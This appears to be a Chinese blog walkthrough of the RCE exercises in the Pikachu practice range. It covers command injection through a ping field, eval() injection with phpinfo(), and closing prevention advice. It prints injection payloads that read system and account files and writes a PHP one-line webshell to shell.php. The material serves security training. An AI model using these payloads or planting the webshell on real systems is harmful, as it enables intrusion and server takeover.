Pikachu靶场--RCE

参考借鉴

pikachu-RCE_pikachu rce-CSDN博客

Pikachu靶场-RCE远程命令/代码执行漏洞-CSDN博客

命令执行/代码执行/RCE(CTF教程,Web安全渗透入门)_bilibili

exec"ping"

输入IP地址查看页面反应

可以在IP地址的后面拼接我们想要执行的命令

127.0.0.1 & ipconfig               

127.0.0.1 && type C:\Windows\win.ini

127.0.0.1 | systeminfo

127.0.0.1 && net user

命令连接符 

&命令1和命令2正确都能执行; 当命令1错误命令2正确,只能执行命令2
&&命令1和命令2正确都能执行;命令1错误命令2正确,不能能执行命令2
|不管命令1正确还是错误,都只执行命令2
||

命令1正确只会执行命令1,命令1错误才会执行命令2

输入:127.0.0.1 & ipconfig


 

还可以写入一句话木马

127.0.0.1 | echo "<?php @eval($_REQUEST[123])?>" > shell.php

然后可使用中国蚁剑进行连接

                        

                

exec"evel"

eval():会将符合PHP 语法规范字符串当作PHP代码执行

在执行框中输入单引号,出现报错,证明此处存在eval()函数注入点漏洞

输入:echo(hello);

输入:phpinfo();

该函数主要用于网站建设过程中测试搭建的PHP环境是否正确,很多网站在测试完毕后并没有及时删除,因此当访问这些测试页面时,会输出服务器的关键信息,这些信息的泄露将导致服务器被渗透的风险。

                

        

预防RCE

使用白名单:定义一个接受合法命令或代码输入的白名单,只有在此白名单中的命令或代码才会被执行。这个做法可以限定用户只能进行指定的操作,并且可以有效地防止黑客攻击。
安全编码实践:编写安全代码是防范RCE攻击的一个重要手段。开发者应该禁止使用eval()或exec()等不安全的函数,而是使用更安全的函数来处理用户输入。
输入验证:当处理用户输入时,必须进行必要的验证,包括数据类型、格式和长度等。在校验用户输入之后,再将其传递给执行命令或代码的函数。
限制shell运行环境:在PHP的服务器端配置文件中,可以通过限制可执行文件的路径和基本环境变量来减小攻击面。

  • 5
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值